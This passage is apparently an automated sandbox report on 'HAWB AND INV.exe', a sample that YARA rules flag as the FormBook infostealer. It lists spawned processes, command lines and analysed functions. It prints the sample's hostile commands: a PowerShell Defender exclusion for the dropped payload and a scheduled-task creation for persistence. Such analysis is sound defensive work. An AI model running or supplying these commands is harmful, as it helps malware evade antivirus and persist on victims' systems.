                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: powershell.exe PID: 7020 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
                                                                    Imagebase:0xd30000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 7064 Parent PID: 7020

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: schtasks.exe PID: 7072 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
                                                                    Imagebase:0xe0000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 7080 Parent PID: 7072

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: powershell.exe PID: 4592 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:26
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
                                                                    Imagebase:0xd30000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 4756 Parent PID: 4592

                                                                    General

                                                                    Start time:14:52:27
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: HAWB AND INV.exe PID: 6156 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:27
                                                                    Start date:03/05/2021
                                                                    Path:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    Imagebase:0x750000
                                                                    File size:741376 bytes
                                                                    MD5 hash:42662765A94CE5ECE11529509F937711
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: explorer.exe PID: 3440 Parent PID: 6156

                                                                    General

                                                                    Start time:14:52:30
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:
                                                                    Imagebase:0x7ff6f22f0000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: ipconfig.exe PID: 6556 Parent PID: 3440

                                                                    General

                                                                    Start time:14:53:23
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                    Imagebase:0xaa0000
                                                                    File size:29184 bytes
                                                                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >

                                                                      Analysis Process: HAWB AND INV.exe PID: 6752 Parent PID: 6012 HAWB AND INV.exeCOMMON

                                                                      Executed Functions

                                                                      Function 012ABA60, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 9804b800d832f05da101ab91401f43f8962d048e0fcc4c65f7df5ab555aad293
                                                                      • Instruction ID: 35736a36d13ddf6486f7a28dd9a28d0c274811f31c4c4d6d69e56b4271a411d3
                                                                      • Opcode Fuzzy Hash: 9804b800d832f05da101ab91401f43f8962d048e0fcc4c65f7df5ab555aad293
                                                                      • Instruction Fuzzy Hash: B9713470A10B069FDB24DF2AD44576ABBF1FF88304F40892DE686D7A40EB75E805CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012AAAD4, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012AE02A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: b3ef47abc9a87f0a4b3a41b98643d09006604309125f34ba590990a8d2a7541c
                                                                      • Instruction ID: 6f17a4c805edc2510d47eeb95e9427dc7a0edcc9957a565e8a914a180d56d7a2
                                                                      • Opcode Fuzzy Hash: b3ef47abc9a87f0a4b3a41b98643d09006604309125f34ba590990a8d2a7541c
                                                                      • Instruction Fuzzy Hash: 4E51E0B0D10309DFDB14CF9AC884ADEBFB5BF48314F64822AE919AB210D7749845CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012ADF0D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012AE02A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 5d2e575d1e795110f03591af40d463600a3d6c22d93f641b132816f90cdc01ce
                                                                      • Instruction ID: 29dca61fc93ac02e7f2c5e0e0920370782a869cf4986f53ef2b17f772c610b89
                                                                      • Opcode Fuzzy Hash: 5d2e575d1e795110f03591af40d463600a3d6c22d93f641b132816f90cdc01ce
                                                                      • Instruction Fuzzy Hash: 8451E1B1D10309DFDB14CF9AC884ADEBFB5BF48314F65812AE919AB210D7749845CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012A7009, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012A7046,?,?,?,?,?), ref: 012A7107
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 78ecf06c32eaa27458b0f48c6933d79969fcacc3a97c44d745af2e2e7c1835d7
                                                                      • Instruction ID: d746875bdd06cb6b75388b2a55108c1636660166940f2a1533240f1e2aa00327
                                                                      • Opcode Fuzzy Hash: 78ecf06c32eaa27458b0f48c6933d79969fcacc3a97c44d745af2e2e7c1835d7
                                                                      • Instruction Fuzzy Hash: 714155B6900218AFCB00CF99D844AEEBFF9EF48320F14801AFA04A7351C775A914DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0583CF5C, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(?), ref: 0583EF6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 5131f536dddd1ef0e5c103a3ac2ed66a771d5734e63077806a2690d2631307b1
                                                                      • Instruction ID: aa58e211328a1f604af610f6661a2a927fd9989bf6843056f2734a8672cbf4e4
                                                                      • Opcode Fuzzy Hash: 5131f536dddd1ef0e5c103a3ac2ed66a771d5734e63077806a2690d2631307b1
                                                                      • Instruction Fuzzy Hash: 5B3134B0D146499FCF14CFA9C886B9EBBF5BB08314F148569E816EB380D7B49885CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012A6C44, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012A7046,?,?,?,?,?), ref: 012A7107
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: ddaa497bb25e1ee55748dac1f8374c8d070c63280a618446866e27f463bd14a5
                                                                      • Instruction ID: 394fed2d15f917670fa7b51c4676f05fce08c58b3efd55738db17b0c58fb40f1
                                                                      • Opcode Fuzzy Hash: ddaa497bb25e1ee55748dac1f8374c8d070c63280a618446866e27f463bd14a5
                                                                      • Instruction Fuzzy Hash: 6D2114B5D002089FDB10CFAAD884AEEBBF8FB48320F54841AE914A7311D375A954CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012A7078, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012A7046,?,?,?,?,?), ref: 012A7107
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: afa416ca53f0a0ab20e7db059f68a246d082237c7616ab8319eb072cdaddeaaf
                                                                      • Instruction ID: 8d72f5bd2df6e17fd987098bfe5544807d545b3cf771ec22f6e8747c9bceea3b
                                                                      • Opcode Fuzzy Hash: afa416ca53f0a0ab20e7db059f68a246d082237c7616ab8319eb072cdaddeaaf
                                                                      • Instruction Fuzzy Hash: 132116B5D002199FDB10CF9AD884ADEBBF8FF48324F54841AE914A7310D374A954CF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012AA980, Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012ABD21,00000800,00000000,00000000), ref: 012ABF32
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: e2802d89f8007f6b39755c59d161b61e6550472458e330de9ef74ee20ee85e3d
                                                                      • Instruction ID: 8f27435439a8499e9551f28140b2d6fbf49b4caaa61b6f5526202b9e1ba70e9f
                                                                      • Opcode Fuzzy Hash: e2802d89f8007f6b39755c59d161b61e6550472458e330de9ef74ee20ee85e3d
                                                                      • Instruction Fuzzy Hash: A42138B68043488FDB10DFAAC844ADEBFF8EF49314F44846AE655A7201C375A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012AA998, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012ABD21,00000800,00000000,00000000), ref: 012ABF32
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 4ab6e8737c4e920a99fd5efc854666ca4b9e04d9839e35b8c0de5e5ca10ad1e3
                                                                      • Instruction ID: a6a164983a07e7a61e234ee24c1c578d3c30c19202ace17eedaf8fa5e612db65
                                                                      • Opcode Fuzzy Hash: 4ab6e8737c4e920a99fd5efc854666ca4b9e04d9839e35b8c0de5e5ca10ad1e3
                                                                      • Instruction Fuzzy Hash: 781114B6D003498FDB10DF9AD444ADEFBF8EB48324F54842AE615A7200C375A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012ABEC0, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012ABD21,00000800,00000000,00000000), ref: 012ABF32
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 818b7b4b6e926db69f394ea96d5fb8345e1a860e13c8d01addb4fbd13379e45c
                                                                      • Instruction ID: a9555c1bde3a8b9e3adc523e6205309d03987a4e5dffbba4962b9a89e629b096
                                                                      • Opcode Fuzzy Hash: 818b7b4b6e926db69f394ea96d5fb8345e1a860e13c8d01addb4fbd13379e45c
                                                                      • Instruction Fuzzy Hash: E81123B6C003498FDB10CFAAC444ADEFBF8FB48324F55896AE515A7600C379A549CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012AA944, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,012ABA73), ref: 012ABCA6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: c7143c199b9a8e9229d75fd9e0e2c06591ac6a5769c974e6d361f252c426997b
                                                                      • Instruction ID: 2c7c4ea37a7f994ee8123c4f633f1a7dfd7864af79047367695a725c5349e3ca
                                                                      • Opcode Fuzzy Hash: c7143c199b9a8e9229d75fd9e0e2c06591ac6a5769c974e6d361f252c426997b
                                                                      • Instruction Fuzzy Hash: D61120B1C102098FCB20DF9AC444B9EFBF9AB88324F50841AD919B7200C378A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012ADB34, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,012AE148,?,?,?,?), ref: 012AE1BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      • Opcode ID: 76b12d01a1345e7132c5d8c235752707ce959b4ae4dd9657a59069bffa5effc2
                                                                      • Instruction ID: 4deea32e43b0a03ea8aa16134e97818d37f4c81d381e5de2056cfd74bb1e6697
                                                                      • Opcode Fuzzy Hash: 76b12d01a1345e7132c5d8c235752707ce959b4ae4dd9657a59069bffa5effc2
                                                                      • Instruction Fuzzy Hash: AC1103B59003099FDB20DF9AD885BDEBBF8EB48324F50841AE915A7340C374A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012AE159, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,012AE148,?,?,?,?), ref: 012AE1BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      • Opcode ID: 38bb2a695d6d8e08d92c87057ac5406ac3fe9ad6c29b3b9797fa7498a2b436f8
                                                                      • Instruction ID: b4106c45c8692c073c81a2a175630bde5d753d2a5a9b7180ab7dec378f12a7ba
                                                                      • Opcode Fuzzy Hash: 38bb2a695d6d8e08d92c87057ac5406ac3fe9ad6c29b3b9797fa7498a2b436f8
                                                                      • Instruction Fuzzy Hash: 431115B59003498FDB10DF99D585BDEBBF8EB48324F14845AD955A7700C374A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 05833F50, Relevance: 2.6, Strings: 2, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ng\$ng\
                                                                      • API String ID: 0-2257563372
                                                                      • Opcode ID: 32dbbb8fdbab0df64cd9c33eeffdb1fcecc29e443041d34222bd019bcc024b03
                                                                      • Instruction ID: 6bf7c7fb1c0a6a64b91b6f1398d5656fda8e16b2f77fa778a57e103adfb27933
                                                                      • Opcode Fuzzy Hash: 32dbbb8fdbab0df64cd9c33eeffdb1fcecc29e443041d34222bd019bcc024b03
                                                                      • Instruction Fuzzy Hash: C6410A74E042198FDB58CF5AD985BAEF7B6FB88204F1480A9D908AB324DB309E45CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05836A18, Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: cp{
                                                                      • API String ID: 0-282242202
                                                                      • Opcode ID: 1f6713d6f605e3cae3e9b441360d410972dc83e6636e75fc3b20b5a065af744c
                                                                      • Instruction ID: 143c747b674d8c96071b2b86015ba7a1a859b00c4a37cc3c0e0f7a6f06cb63a4
                                                                      • Opcode Fuzzy Hash: 1f6713d6f605e3cae3e9b441360d410972dc83e6636e75fc3b20b5a065af744c
                                                                      • Instruction Fuzzy Hash: 54B10474E05228CFDB64CF68C8997ADBBB2FB89304F1095AAD40DA7254DB345E81CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 058320C0, Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5'Iv
                                                                      • API String ID: 0-1131325359
                                                                      • Opcode ID: 969369b8aba75c7ff8dd2504f786a40def7256fb0749870e9a1317070f765881
                                                                      • Instruction ID: 8681447f57f7ff18a2235bcee45a3dfa1ecd164776fd0a00e24cdd65a842d5b5
                                                                      • Opcode Fuzzy Hash: 969369b8aba75c7ff8dd2504f786a40def7256fb0749870e9a1317070f765881
                                                                      • Instruction Fuzzy Hash: C5413A74E012188FDB54CF6AD981B9EFBB2BB88214F10C0AAD90DA7355DB305E858F95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 058320B0, Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5'Iv
                                                                      • API String ID: 0-1131325359
                                                                      • Opcode ID: 1534391eaf0c454e3c25723f973868c5330198f3981379931e2b5a739ff76017
                                                                      • Instruction ID: 07081ce0e0f0f4e6711a05c7b03598effc13f575e791f105b78255ca6a3e28ec
                                                                      • Opcode Fuzzy Hash: 1534391eaf0c454e3c25723f973868c5330198f3981379931e2b5a739ff76017
                                                                      • Instruction Fuzzy Hash: 5F414A74E012189FDB58CF65D981BAEBBF3BB88200F14C0AAD909A7355DB305E85CF55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05833F41, Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ng\
                                                                      • API String ID: 0-3683008957
                                                                      • Opcode ID: 1d51dc73ce0ed48cffe5681eb844b35789a3125f289ce39e2411477a4b4a901b
                                                                      • Instruction ID: feb8f3a980a69b4866c46e4d4c88efb9b66e93776e22844fcdb1f2eefd5eabb1
                                                                      • Opcode Fuzzy Hash: 1d51dc73ce0ed48cffe5681eb844b35789a3125f289ce39e2411477a4b4a901b
                                                                      • Instruction Fuzzy Hash: 9E41EB70E112198FDB58CF69D945B9EBBF2BF88204F14C0AAD908EB224DB309E45CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012AF838, Relevance: .6, Instructions: 611COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4754ce7cd2e063b5891b86a32b7fb67069cc6877e9f9eeb662532937ebc1dc37
                                                                      • Instruction ID: 78709ebe2b7f9813e2636868a34e787b9390ef3e2e7bb92fd7a10559c4512769
                                                                      • Opcode Fuzzy Hash: 4754ce7cd2e063b5891b86a32b7fb67069cc6877e9f9eeb662532937ebc1dc37
                                                                      • Instruction Fuzzy Hash: F8225731B106128FCB25DF38C69467EBBB6AF85304B5A4469D616CB362DF38DC41C791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012AA758, Relevance: .3, Instructions: 265COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: efda8168979b427d1c08c2bea5b2a18b16a06e36f66e011eea821bf7300b4ce5
                                                                      • Instruction ID: 703f79e87140acc520bbb58870bd8f3355bee280eba791a4e2c8dd9b9ccd92b4
                                                                      • Opcode Fuzzy Hash: efda8168979b427d1c08c2bea5b2a18b16a06e36f66e011eea821bf7300b4ce5
                                                                      • Instruction Fuzzy Hash: A6A19132E2021A8FCF15DFB5D8445EEBBB2FF85300B55816AE905BB221EB75A905CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05831920, Relevance: .3, Instructions: 252COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
